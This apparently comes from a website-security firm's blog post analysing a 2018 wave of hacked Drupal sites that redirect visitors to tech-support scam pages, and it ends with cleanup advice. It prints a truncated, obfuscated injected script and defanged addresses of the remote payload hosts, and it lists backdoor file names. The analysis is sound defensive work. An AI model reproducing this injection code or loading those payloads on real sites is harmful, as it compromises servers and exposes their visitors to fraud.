— Denis (@unmaskparasites) April 24, 2018
… with over a thousand compromised sites that redirect visitors to “Tech support” scam pages.
eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));
The code injects a remote script from hxxps://js.localstorage[.]tk/s.js?crt=new, which is responsible for the malicious redirects.
This script is also being injected into various locations in the database in plain text:
Alternatively, the script can be loaded from hxxp://193.201.224 .233/m.js?d=3.
This variation can also be found on some WordPress sites.
Advise for the rest of the community…
Search for tonure.php, jooner.php, almio.php, cciawwi folder viawwi folder
All of these files are being requested every minute
— Cosy Studios (@CosyStudios) May 1, 2018
As you might have noticed, it tries to inject the malware into files starting from a directory three levels above the current file (../../..). This means that this code may infect all neighboring sites that share the same server account with the current site.
To clean this infection, one needs to fully patch and upgrade Drupal (as of this post, at least to Drupal 7.59, Drupal 8.5.3, or Drupal 8.4.8, depending on the branch you are using). Next, you’ll need to find and remove all the backdoors (don’t forget to check for malicious cron jobs), and then remove the injected malware from the infected Drupal files and database.
Attempting to remove the infection in a different order may result in reinfection before you finish the cleanup. You can find complete step-by-step instructions in our guide How to clean a Hacked Drupal Website.
Using a website firewall that proactively patches your sites against new threats will help if you don’t monitor news about discovered vulnerabilities or are unable to patch your site as soon as patches are released.